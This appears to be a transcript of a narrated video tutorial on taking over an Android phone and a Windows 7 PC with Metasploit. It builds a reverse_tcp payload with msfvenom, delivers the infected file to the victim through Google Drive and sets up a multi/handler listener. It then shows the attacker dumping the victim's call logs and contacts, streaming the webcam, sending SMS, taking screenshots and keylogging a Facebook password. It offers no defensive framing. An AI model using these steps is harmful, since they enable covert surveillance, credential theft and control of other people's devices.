Now we are going to hack an Android device with an application. The first step is to create an APK file by using the command as shown in the screen. After creating the APK file, we must copy the file onto the victim's device and install it. After installing it in the victim's device, we must open MSF console in order to create the payload and set the payload. After setting the payload, we must set the L port and L host values. Now in order to run the program, we must use the command exploit. Now the device is hacked. We can put help command in order to check what are the operations that can be done in the victim's device. The first operation that is we're going to do is get the call list from the victim device by using the dump underscore caller, which is stored in the root folder. So these are the call list of the victim's device, which is incoming and outgoing calls. The next operation is that we're going to perform is that we're going to get the contact list from the victim device by using the command dump underscore contacts, which is stored in the root folder. So these are the contacts that is in the victim device. Now we are going to get the device information by using the command sysinfo. So these are the information of the victim's device. The next operation is going to perform is we're going to access the webcam by using the command webcam uh, underscore stream. So now the victim's webcam is accessed. So now you can see the webcam of the victim's device. Now we will get the screenshot of the victim's device. This is the present screenshot of the victim device. We can also send message from victim device to another device by using the command send underscore SMS. Now the message is sent to another device.
So now we'll be hacking the Windows 7 OS. So we have opened the Kali terminal now. First we are checking with the IP address of this Kali system. So 192.168.1.39 is the IP address. Now we'll be creating a file that is .exe file Only with this file we are going to hack the Windows system. So now this is the command that we are going to use for hacking this, for creating this exe file. ms msfnm -p windows / metapreta /reverse_tcp. So this same IP address that we are going to give there for this file, for the hell host we are giving the same IP address. L port we are going to set it 1245 1234, sorry, and we'll be saving it in the desktop here. So home/giri/desktop /file.exe. So file.exe will be the file name. Now this file will be getting created. Yes. So this file is created and it is there in the desktop now. So from this desktop we are going to save this file in the drive and we'll be downloading it in the victim system. That is the Windows 7 victim system which contains the Windows 7 OS. And now we are opening the MSF console. So we are saving it in the drive, Google Drive, and we'll be opening this drive in the Windows victim system and downloading this exe file. So we are uploading this file, the drive, from the root folder. File.exe is the hacking file, the file through which we are going to hack the system. It gets uploaded in the drive, and now we'll go to the Windows 7 OS. In this system, we have opened the drive again here, and we'll be downloading the uh, virus file, that is file.exe. So we'll be downloading it. So this infected file is now downloaded in the victim system. It is still getting downloaded. Yes, now it is download. It is saved in the victim system. So this is the first command that we are giving. Yes, first we'll be setting the payload. So first use exploit /multi/handler, and then we are setting the payload now. So here the L host will be the same IP address that we have already given while creating the infected file. So set lhost, and the IP address will be the same as the Kali machine's IP address. That is 192.168.1.39. So the system's IP address, it will be the same. So we'll set lhost as this IP address, and L port will also be the same. That is 1234 that we have set during while creation of the infected file. And these are the options, like whether the L port and L host are set. So before after giving exploit, we have to just install the infected file in the victim's machine. So now we have opened the infected file in the victim's machine, and the system gets hacked. So Windows 7 is hacked now. These are the several options that are available for performing certain operations. Now we'll be performing several other operations, like first we'll find the IP address of the victim's machine. So 192.168.1.38, that is the IP address of the victim's machine. And then we'll find the system information. So the computer name and the OS that is present. So these are the informations that will be present here. And now we'll take the screenshot of the victim's machine, like current screen. We'll take a screenshot of it. So screenshot is the command that we are using, and this gets saved in the root folder. And we'll show it to you now. We'll open the root folder and we'll show the current screenshot of the victim's current screenshot of the victim's machine. So this is the screenshot. This is the current screen that is present in the victim's machine. So finally, Windows 7 is hacked. So we'll just note it in the notepad, and we'll take a screenshot of this also. You are hacked finally. And we'll just increase the font. Yes, now we'll take a screenshot of this and we'll save it in the root folder in the Kali machine. Again, screenshot will be the command. Yes, this gets saved in the root folder. We'll open it now. So yes, this is screenshot. So local time command, we are using this to just find the exact time that is present in the Windows 7 OS at that point of time. So it is the same that gets displayed here. There are several commands that can be done actually. So ISM folder is created from the Kali system. We can easily create any folder in the Windows 7 OS. That's the ID, PC ID, and the name. Now let's see how we can do the keyboard scan action. So key scan underscore start is the command. Now we'll go to any web browser, like any of the social media, like we'll go to the Facebook. We'll try to log into Facebook. Yes. So we'll log into Facebook now. We'll give the username and some password. So hey ISM is the password. We'll get this password in the Kali machine now. Key scan is the command. Key scan underscore dump is the command. So ISM is the password and the username is present in the front. So we have got the username and the password in our system.